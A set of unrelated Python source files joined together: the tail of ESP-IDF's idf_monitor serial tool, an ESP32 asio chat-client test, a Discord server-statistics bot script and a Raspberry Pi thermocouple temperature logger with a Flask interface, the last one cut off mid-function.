def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
# internal state
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("--- {}".format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make("flash")
elif cmd == CMD_APP_FLASH:
self.run_make("app-flash")
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError("Bad command data %d" % (cmd))
def main():
def _get_default_serial_port():
"""
Same logic for detecting serial port as esptool.py and idf.py: reverse sort by name and choose the first port.
"""
try:
ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
return ports[0]
except Exception:
return '/dev/ttyUSB0'
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', _get_default_serial_port())
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
asio_chat_client_test.py
|
import os
import re
import socket
import time
from threading import Thread
import ttfw_idf
global g_client_response
global g_msg_to_client
g_client_response = b''
g_msg_to_client = b' 3XYZ'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def chat_server_sketch(my_ip):
global g_client_response
print('Starting the server on {}'.format(my_ip))
port = 2222
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(600)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
print('connection accepted')
q.settimeout(30)
q.send(g_msg_to_client)
data = q.recv(1024)
# check if received initial empty message
if (len(data) > 4):
g_client_response = data
else:
g_client_response = q.recv(1024)
print('received from client {}'.format(g_client_response))
s.close()
print('server closed')
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_asio_chat_client(env, extra_data):
"""
steps: |
1. Test to start simple tcp server
2. `dut1` joins AP
3. Test injects server IP to `dut1`via stdin
4. Test evaluates `dut1` receives a message server placed
5. Test injects a message to `dut1` to be sent as chat_client message
6. Test evaluates received test message in host server
"""
global g_client_response
global g_msg_to_client
test_msg = 'ABC'
dut1 = env.get_dut('chat_client', 'examples/protocols/asio/chat_client', dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, 'asio_chat_client.bin')
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('asio_chat_client_size', '{}KB'.format(bin_size // 1024))
# 1. start a tcp server on the host
host_ip = get_my_ip()
thread1 = Thread(target=chat_server_sketch, args=(host_ip,))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
dut1.expect(re.compile(r' IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'), timeout=30)
# 3. send host's IP to the client i.e. the `dut1`
dut1.write(host_ip)
# 4. client `dut1` should receive a message
dut1.expect(g_msg_to_client[4:].decode()) # Strip out the front 4 bytes of message len (see chat_message protocol)
# 5. write test message from `dut1` chat_client to the server
dut1.write(test_msg)
while len(g_client_response) == 0:
time.sleep(1)
g_client_response = g_client_response.decode()
print(g_client_response)
# 6. evaluate host_server received this message
if (g_client_response[4:7] == test_msg):
print('PASS: Received correct message')
pass
else:
print('Failure!')
raise ValueError('Wrong data received from asi tcp server: {} (expected:{})'.format(g_client_response[4:7], test_msg))
thread1.join()
if __name__ == '__main__':
test_examples_protocol_asio_chat_client()
|
statistics.py
|
import threading
import discord
import asyncio
from time import gmtime, strftime, sleep
from utils import gspread_api
client = None
msgid = ""
channelid = "307085753744228356"
msgcount = 0
async def setServerStats():
await client.wait_until_ready()
await asyncio.sleep(3)
while not client.is_closed:
global msgid
dataset = gspread_api.get_stats()
out = {
"All Users Peak": dataset[0],
"Max Online Peak": dataset[1],
"Average Online Members": dataset[3],
"Average Online Suporters": dataset[5],
"Average on. Membs / Supp": dataset[6],
"Max on. Membs / Supp:": dataset[8],
"Collected Datasets": dataset[4]
}
em = discord.Embed(color=discord.Color.gold(), title="SERVER STATISTICS")
em.description = "See full stats **[here](https://s.zekro.de/dcstats)**\n\n*Last update: %s*\n*This will be updated every 10 minutes.*" % strftime("%Y-%m-%d %H:%M:%S", gmtime())
for k, v in out.items():
em.add_field(name=k, value=v, inline=False)
chan = list([c for c in list(client.servers)[0].channels if c.id == channelid])[0]
if msgid == "":
msg = await client.send_message(chan, embed=em)
msgid = msg.id
else:
await client.edit_message(await client.get_message(chan, msgid), embed=em)
await asyncio.sleep(10 * 60)
def action():
while not client.is_closed:
date = strftime("%d.%m.%Y %H:%M", gmtime())
server = list(client.servers)[0]
users = server.members
supprole = discord.utils.get(server.roles, name="Supporter")
members = [u for u in users if not u.bot]
online = [m for m in members if not str(m.status) == "offline"]
suppsonline = [m for m in online if supprole in m.roles]
global msgcount
gspread_api.append([date, len(members), len(online), len(suppsonline), msgcount])
msgcount = 0
sleep(30 * 60)
def run():
t = threading.Thread(target=action)
t.start()
|
temperature-monitor.py
|
"""Multi-channel temperature logger
Reads the configuration from an associated xml file.
Presents a set of webpages to display the temperature from an arbitrary number of temperature sensors as defined by the configuration.
"""
from flask import Flask, render_template, request
from flask_restful import Api, Resource, reqparse, fields, marshal
import datetime
import xml.etree.ElementTree as ET
import os
import threading
import time
import csv
import RPi.GPIO as GPIO
from max31855 import MAX31855, MAX31855Error
sensor_fields = {
'name': fields.String,
'uri': fields.Url('temperature_sensor')
}
class SystemConfig(Resource):
def __init__(self):
super(SystemConfig, self).__init__()
def get(self):
return {"name": title, "units": units}
class TemperatureSensorList(Resource):
def __init__(self):
super(TemperatureSensorList, self).__init__()
def get(self):
return [marshal(temperatureSensor, sensor_fields) for temperatureSensor in sensors]
class TemperatureSensor(Resource):
def __init__(self):
super(TemperatureSensor, self).__init__()
def get(self, id):
sensor = [sensor for sensor in sensors if sensor['id'] == id]
if len(sensor) == 0:
abort(404)
return {'temperature': sensor[0]['temperature'], 'age': sensor[0]['age']}
# Sensor measurements
class MeasurementThread ( threading.Thread ):
def run ( self ):
global sensors
global temps
global air_temp
global cs_pins
global clock_pin
global data_pin
global units
thermocouples = []
for cs_pin in cs_pins:
thermocouples.append(MAX31855(cs_pin, clock_pin, data_pin, units, GPIO.BOARD))
while True: # TODO: Ideally want to detect when closing to exit the loop
channel = 1
now = datetime.datetime.now()
#print(now)
timeString = now.strftime("%H:%M on %d-%m-%Y")
for thermocouple in thermocouples:
if (channel == 1):
air_temp = int(thermocouple.get_rj())
sensors[0]['temperature'] = air_temp
try:
tc = str(int(thermocouple.get()))
temps[channel]['time'] = now
temps[channel]['age'] = ''
temps[channel]['temperature'] = tc+u'\N{DEGREE SIGN}'+units.upper()
temps[channel]['last'] = tc # Record the last valid measurement
sensors[channel]['temperature'] = tc
sensors[channel]['age'] = ''
except MAX31855Error as e:
tc = "Error: "+ e.value
if (temps[channel]['time'] == 'Never'):
age_string = "(Never measured)"
temps[channel]['temperature'] = tc
else:
temps[channel]['temperature'] = temps[channel]['last']
age = now - temps[channel]['time']
if (age.days == 0):
if (age.seconds < 60):
age_string = "(" + str(age.seconds) + "s)"
else:
if ((int(age.seconds/60)) == 1):
age_string = "(" + str(int(age.seconds/60)) + " min)"
else:
if (age.seconds > (60 * 60)): # > 1 hour
if ((int(age.seconds/60/60)) == 1):
age_string = "(" + str(int(age.seconds/60/60)) + " hour)"
else:
age_string = "(" + str(int(age.seconds/60/60)) + " hours)"
else:
age_string = "(" + str(int(age.seconds/60)) + " mins)"
if (age.seconds > (5 * 60)): # 5 mins
temps[channel]['temperature'] = tc + ". Last: " + str(temps[channel]['last'])
else:
if (age.days == 1):
age_string = "(" + str(age.days) + " day)"
else:
age_string = "(" + str(age.days) + " days)"
temps[channel]['temperature'] = tc
temps[channel]['age'] = age_string
sensors[channel]['temperature'] = temps[channel]['temperature']
sensors[channel]['age'] = age_string
channel = channel + 1
#end = datetime.datetime.now()
#print(end-now)
time.sleep(measurement_interval)
for thermocouple in thermocouples:
thermocouple.cleanup()
# Initialisation
# Read config from xml file
# Find directory of the program
dir = os.path.dirname(os.path.abspath(__file__))
# Get the configuration
tree = ET.parse(dir+'/config.xml')
root_cfg = tree.getroot()
HW_cfg = root_cfg.find('HARDWARE')
sensors_cfg = root_cfg.find('SENSORS')
display_cfg = root_cfg.find('DISPLAY')
logging_cfg = root_cfg.find('LOGGING')
# Read hardware configuration
# Clock
CLK = HW_cfg.find('CLOCK')
clock_pin = int(CLK.find('PIN').text)
# Data
DATA = HW_cfg.find('DATA')
data_pin = int(DATA.find('PIN').text)
# Measurement interval
measurement_interval = int(HW_cfg.find('INTERVAL').text) # Interval in seconds between measurements
# Chip Selects
cs_pins = []
for child in sensors_cfg:
cs_pins.append(int(child.find('CSPIN').text))
# Read display settings configuration
units = display_cfg.find('UNITS').text.lower()
title = display_cfg.find('TITLE').text
sensors = [
{
'id': 0,
'name': u'Air',
'temperature': u'-',
'time' : 'Never',
'age' : ''
}]
air_temp = '-'
temps = {}
channel = 1
for child in sensors_cfg:
# sensors used to store measurements for REST API
sensors.append({'id': channel, 'name': child.find('NAME').text, 'temperature': u'-', 'age' : ''})
# temps used to store measurements for Flask HTML API
temps[channel] = {'name' : child.find('NAME').text, 'temperature' : '', 'time' : 'Never', 'age' : ''}
channel = channel + 1
# Read logging
logging_cfg = root_cfg.find('LOGGING')
log_interval = int(logging_cfg.find('INTERVAL').text)*60 # Interval in minutes from config file
log_status = "Off" # Values: Off -> On -> Stop -> Off
pending_note = ""
MeasurementThread().start()
app = Flask(__name__)
# Setup Flask REST interface
appREST = Flask(__name__, static_url_path="")
apiREST = Api(appREST)
apiREST.add_resource(SystemConfig, '/temperaturemonitor/api/v1.0/config/systemconfig', endpoint = 'SystemConfig')
apiREST.add_resource(TemperatureSensorList, '/temperaturemonitor/api/v1.0/config/sensors', endpoint = 'temperature_sensors')
apiREST.add_resource(TemperatureSensor, '/temperaturemonitor/api/v1.0/measure/sensors/<int:id>', endpoint = 'temperature_sensor')
# Flask web page code
@app.route('/')
def index():
global title
global log_status
global pending_note
now = datetime.datetime.now()
timeString = now.strftime("%H:%M on %d-%m-%Y")
if log_status == "On":
logging = "Active"
else:
logging = "Inactive"
if pending_note != "":
note = "Pending note: " + pending_note
else:
note = ""
templateData = {
'title' : title,
'time': timeString,
'logging' : logging,
'note' : note
}
return render_template('main.html', **templateData)
@app.route("/", methods=['POST']) # Seems to be run regardless of which page the post comes from
def log_button():
global log_status
global pending_note
if request.method == 'POST':
# Get the value from the submitted form
submitted_value = request.form['logging']
if submitted_value == "Log_Start":
if (log_status == "Off"):
log_status = "On"
LogThread().start()
if submitted_value =="Log_Stop":
if (log_status == "On"):
log_status = "Stop"
if submitted_value =="Add_Note":
pending_note = request.form['note']
return index()
@app.route('/note')
def note():
if pending_note != "":
note = "Pending note: " + pending_note
else:
